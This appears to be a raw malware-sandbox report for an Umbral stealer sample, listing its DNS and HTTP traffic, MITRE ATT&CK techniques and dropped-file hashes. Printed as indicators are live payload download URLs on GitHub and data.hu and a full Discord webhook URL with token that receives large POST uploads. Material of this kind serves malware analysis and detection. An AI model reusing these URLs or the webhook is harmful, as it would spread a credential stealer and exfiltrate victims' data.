ETag: "6070ab7b-c00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request6.215.227.35.in-addr.arpaIN PTRResponse6.215.227.35.in-addr.arpaIN PTR621522735bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request73.97.65.217.in-addr.arpaIN PTRResponse73.97.65.217.in-addr.arpaIN PTRs73ip4lp01wwdhhu
-
Remote address:208.95.112.1:80RequestGET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 161
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.135.232discord.comIN A162.159.138.232discord.comIN A162.159.137.232discord.comIN A162.159.136.232discord.comIN A162.159.128.233
-
POSThttps://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMUmbral.exeRemote address:162.159.135.232:443RequestPOST /api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupM HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 940
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=4d07554a563d11efb90c4a6d507782d5; Expires=Wed, 08-Aug-2029 10:51:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1723200677
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2rroAk0ZM1m1TAlJbQ8c7SZ%2B8gJr2X0XCtjn%2FgGk39svlc3qtL%2FnKS2nWuoVQjyuogTHKPfDAgvDz5EvH0fo64aJjCVOyfkV4cuA6ItecMsyH1mx2rRNOXL8G7E"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=4d07554a563d11efb90c4a6d507782d51124c81bee95db3e1598f8a4cf54e5b731224616948c4c38aff769c014a78749; Expires=Wed, 08-Aug-2029 10:51:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=fa8f18397ddb6d39f8f356202efeda452dc10d82-1723200675; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ZEm5f8xgWU2eZMwPcbrGzvSSm0KswNZDUNuzaCZDfwU-1723200675754-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b07309e3ca660e1-LHR
-
POSThttps://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMUmbral.exeRemote address:162.159.135.232:443RequestPOST /api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupM HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="1f1a6053-ad92-4ac9-ae80-d0f93fd03932"
Host: discord.com
Cookie: __dcfduid=4d07554a563d11efb90c4a6d507782d5; __sdcfduid=4d07554a563d11efb90c4a6d507782d51124c81bee95db3e1598f8a4cf54e5b731224616948c4c38aff769c014a78749; __cfruid=fa8f18397ddb6d39f8f356202efeda452dc10d82-1723200675; _cfuvid=ZEm5f8xgWU2eZMwPcbrGzvSSm0KswNZDUNuzaCZDfwU-1723200675754-0.0.1.1-604800000
Content-Length: 416187
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1723200677
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2Fneyx%2B07L263gAl7j9ocn0YA4yXVdNznG2KrBZRd50u0trgPYYDbeGp88lUQvUeROa1BtzYwME5DJQ9BhJuOPt9DCSHm%2FUw88mOM5nxl0bARAk6aRdymAaIRSl1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 8b07309fadde60e1-LHR
-
Remote address:8.8.8.8:53Request232.135.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request147.142.123.92.in-addr.arpaIN PTRResponse147.142.123.92.in-addr.arpaIN PTRa92-123-142-147deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request25.140.123.92.in-addr.arpaIN PTRResponse25.140.123.92.in-addr.arpaIN PTRa92-123-140-25deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.135.233
-
GEThttps://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26WScript.exeRemote address:162.159.129.233:443RequestGET /attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Language: en-US
Range: bytes=0-
User-Agent: NSPlayer/12.00.19041.1288 WMFSDK/12.00.19041.1288
GetContentFeatures.DLNA.ORG: 1
Host: cdn.discordapp.com
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=EW_xRWgNGVCBbFAGunmPMYBwYxEOU4OHKP6UHhAHqvI-1723200745-1.0.1.1-TGSVDv2E14TVBAymJstK5Wi4f493JpEweYiQaqgKDFfD0JWuv.iR2T7jwtdE3hbE97u0P3dbnCChX1jGrh6YcA; path=/; expires=Fri, 09-Aug-24 11:22:25 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zarCttHBtWQ7%2F%2Fs91714vpKcaewe092XUOTh5Qe6ku0Say3wEb8xNaXTbcG0FakKK38PveSapnxwIATeWf9dAgQTSdkc4IhNexZyL2WsgvdMTqzSbBD0fLNl%2F5UyV6pYGigkqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=TJz0.l8AGyEFkVeMuLwGyacUx1CpWs_gzUNS2piz8.4-1723200745858-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b0732558e2b653e-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26WScript.exeRemote address:162.159.129.233:443RequestGET /attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26 HTTP/1.1
Accept: */*
User-Agent: NSPlayer/12.0.19041.1288 WMFSDK/12.0
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: cdn.discordapp.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=3XDfw.HIPTwUXyjT7l2lvvwpa1G436UnmtDbgG4OJw0-1723200746-1.0.1.1-Re2roGSMQU1CmBZLrz7CSzWZvkndjPuiXJTL23Ekidwc8ac0FI3r6PzwIdZb88zUYJbhaF0ZV5jsqSvSAAJEWg; path=/; expires=Fri, 09-Aug-24 11:22:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTW2hA%2FEaefJU7Lk9EcpkwQy7O3BcCZhNOK%2B0k4po%2BDBKGye4dqquk4eyhft%2F4sIzFYw3upDE73wb7fDozYj87ooARorCM0kb9SMonkhfLjts9DuB1JmIP9NNUYHl3iRJyE4Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Set-Cookie: _cfuvid=Fh1wJSJPicmuwOtswgm1y4SYo30YCfYCGASiOX8Wthk-1723200746269-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b0732580b9648c8-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request233.129.159.162.in-addr.arpaIN PTRResponse
-
20.26.156.215:443https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exetls, http22.7kB 39.0kB 38 39
HTTP Request
HEAD https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302 -
185.199.111.133:443https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exetls, http26.2kB 251.4kB 114 207
HTTP Request
HEAD https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
200HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206 -
724 B 4.9kB 8 8
HTTP Request
GET https://gstatic.com/generate_204HTTP Response
204 -
35.227.215.6:443https://image.noelshack.com/fichiers/2021/14/5/1617997407-risitas.jpgtls, httpWScript.exe904 B 5.6kB 9 10
HTTP Request
GET https://image.noelshack.com/fichiers/2021/14/5/1617997407-risitas.jpgHTTP Response
404 -
310 B 267 B 5 2
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200 -
1.6kB 13.4kB 15 16
HTTP Request
GET https://ddl8.data.hu/get/387805/13078039/risitas.htaHTTP Response
200HTTP Request
GET https://ddl8.data.hu/get/339969/12880996/melter.exeHTTP Response
200 -
285 B 510 B 5 4
HTTP Request
GET http://ip-api.com/json/?fields=225545HTTP Response
200 -
162.159.135.232:443https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMtls, httpUmbral.exe467.9kB 13.6kB 357 166
HTTP Request
POST https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMHTTP Response
204HTTP Request
POST https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMHTTP Response
200 -
162.159.129.233:443https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26tls, httpWScript.exe1.0kB 4.5kB 7 7
HTTP Request
GET https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26HTTP Response
404 -
162.159.129.233:443https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26tls, httpWScript.exe998 B 4.5kB 8 7
HTTP Request
GET https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26HTTP Response
404
-
71 B 157 B 1 1
DNS Request
73.31.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
20.26.156.215
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.111.133185.199.108.133185.199.110.133185.199.109.133
-
72 B 158 B 1 1
DNS Request
215.156.26.20.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.111.199.185.in-addr.arpa
-
57 B 73 B 1 1
DNS Request
gstatic.com
DNS Response
172.217.23.195
-
73 B 171 B 1 1
DNS Request
195.23.217.172.in-addr.arpa
-
65 B 81 B 1 1
DNS Request
image.noelshack.com
DNS Response
35.227.215.6
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
58 B 127 B 1 1
DNS Request
ddl8.data.hu
DNS Response
217.65.97.73217.65.97.74217.65.97.75
-
71 B 122 B 1 1
DNS Request
6.215.227.35.in-addr.arpa
-
71 B 95 B 1 1
DNS Request
1.112.95.208.in-addr.arpa
-
71 B 105 B 1 1
DNS Request
73.97.65.217.in-addr.arpa
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.135.232162.159.138.232162.159.137.232162.159.136.232162.159.128.233
-
74 B 136 B 1 1
DNS Request
232.135.159.162.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
50.23.12.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
147.142.123.92.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
25.140.123.92.in-addr.arpa
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.129.233162.159.134.233162.159.130.233162.159.133.233162.159.135.233
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
74 B 136 B 1 1
DNS Request
233.129.159.162.in-addr.arpa
MITRE ATT&CK Enterprise v15
Defense Evasion
BITS Jobs
1File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5547df619456b0e94d1b7663cf2f93ccb
SHA18807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA2568b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA51201b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
896KB
MD515bb5c87f3beedb4f24e3e590c233700
SHA10c4d076ef885bc9f2d57f5622d4dd80b781dfebf
SHA256771178781c040efa4617ea46308f5e2270f957704c15f0018a41ccbece45a3e1
SHA512d485867ed8b006a2eebaf54d11907ebbe40b870a15c8f0b92cda14ee663aad692dd7166a2ce71eaadc131483db7c10425c8f64bdfc90ab91e0524f42d12230e5
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
948B
MD574a6b79d36b4aae8b027a218bc6e1af7
SHA10350e46c1df6934903c4820a00b0bc4721779e5f
SHA25660c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA51260e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5e6bee3b9128f2fe70aa3652f29737c89
SHA1f8dd94ca11dbba72cb3455a44b205aebd4fd43c9
SHA2563eb65fecc9702196044cbd759a367a12c611e31f5376540d93a9b5ccf5970fde
SHA512d703288817394791cec3bbf3340a62ad970f94d1f5ac87a6e66097d6d90973cfb9877bad29e4e8a2c25c0c4c94ed33e217b68b81290cabc5df7f6fabaa096598
-
Filesize
64B
MD56de2955025e69e425b762c951623bcfe
SHA1af1dfff33eaf5a66ae9e9374275874a0018638d3
SHA256febc15f1ccad4b1e82b0334ef36ffb2fafe2d0111b25eb86f4d1130b8d3d76b4
SHA512d05f6478af79daca6e2cf7a84ca78ab030293b1de00a14b858fe94b51b8781b9e33552b5d39e4688ae9ea61f97e5bb8c15bb479ad68f001184cef6fe535463e3
-
Filesize
460B
MD55348a4a50b6545f46afedfbb0f8a55ea
SHA12413757e4409f09d4f2e3151144bdc5a8a9cecce
SHA256d1735f45cf2b201bdc47d687f9d5b8a6e15838e5691d7fd33ede99a3fc3aacfb
SHA512cdfb247bb95737cb271d78a894545951c6e3b23cb73806dbbe11a5aacf71178674084197d921ba817bb70286badf94c0179c4cac52d7d679d1ab01978eca7ef3
-
Filesize
236B
MD53a7e0a94fa88dccd40d9b76b37d06db1
SHA1d7604ddb660898ce3b1343aa712cf5926bc68bda
SHA256368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4
SHA51219b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb
-
Filesize
27B
MD5597cf1068c84a5c01afd9472a7453116
SHA1bc9a638c47aab57b04b2257f421a48b2ee682732
SHA2560d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799
SHA5123eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600
-
Filesize
106B
MD5ec385d968eea8bf5abe4587305f39c89
SHA16509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA25698adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8
-
Filesize
1KB
MD5330cc1c8e5f8505ae10af80b4f5a14ff
SHA1e2cfd3f7f1828b71d509b8f9c7e8d77c4bbb757d
SHA2561bd62cfef609d139e16a29248b60ac259a6e83551975baf9c8078177ae2f9ce2
SHA51209d895f2293ae1157f62b8ac68bcd083941176e9312c6426d15a90e2b44d698e72553e2d02f209d6518d600c02790cbe3edbd909d97f47bae0834363d341651d
-
Filesize
1KB
MD5135594160762ab9dd80794d7b34ab32a
SHA1638fef88bbb5d310c51eda07ca10918a482ad3ac
SHA256531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0
SHA51219a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d
-
Filesize
276B
MD58a9b451fd9936100f33b576bb5ec3f02
SHA180c92544f733ddfb96dffa296293fb2835e85f2e
SHA2564e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f
-
Filesize
390B
MD5aabbe725da9751315bbeeda4ef58d816
SHA1476c78912d61e790a793c8e6606825f2b169947c
SHA2560422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360
SHA5120e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd
-
Filesize
490B
MD593e179454db6fe9ac81112193de37cde
SHA14752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9
SHA2568286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc
SHA512a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207
-
Filesize
160B
MD539b6c6dd7cc01de2c2a9d23e527ec938
SHA1ca0f5b1d37662032dd678140bdcedab9d9ddc87f
SHA2564743696bab52f4e2809b7203cbda43675c6bd812bfac470cff2920f4a60c3cc2
SHA512ba729bdc5b61184b221bd8f02d41f76499da62fb3343b00662094ee1dd77048ff0f3816745a979c8612785c9af7c733ba3f365f190a00d2df419ebe08106846a
-
Filesize
179B
MD5523092d53a06f5b46778a0cd7c01d0fb
SHA1221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA25609c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA51272015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb
-
Filesize
139B
MD533aef3ef54ccdb5283776b01ad17b824
SHA1e7c9b3022a966f2efeb5fec2c608679254495692
SHA256c2fbabfc42e23dff770c425bf4a0fafaba1734a8a56fef25a38df7050161a8c8
SHA512f9a8351eb5b44cba06cc514ce9cd25dbbfe70a5729386a7667896d39fc2e99f2afc9784321d02c7035e4020fe5b6780e5e9c1f4627b52921c2c258c9996bf367
-
Filesize
8KB
MD5074b0499fa7df4238b66cf7f0ab1ca64
SHA13ad09a2f3f51e5b4899397ec185672a6c0c4af18
SHA25648fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48
SHA512496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5d9baac374cc96e41c9f86c669e53f61c
SHA1b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA5124ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457
-
Filesize
511B
MD5af25ddf889ed3804a85b487a95993a94
SHA1e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA5128f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_F44A8781B6F141CBB1A818B233ABAF07.dat
Filesize940B
MD5aa4aef9dcdb83f7f08580d9ccd5d410f
SHA1d0bed89b0ff3521e035ebf79977f1ae5d29a7c68
SHA256fe139d82df83d3ea407623680770288e711392b386e45f86070d68f6781c258f
SHA51279eef6d39961e85129fa84610023319de4d665c9636264f53c50e61b174c1fc4a477f06b250b071bbfd9d1939e61a4cfa74fc5c25328ffaa5009c283966b7ce0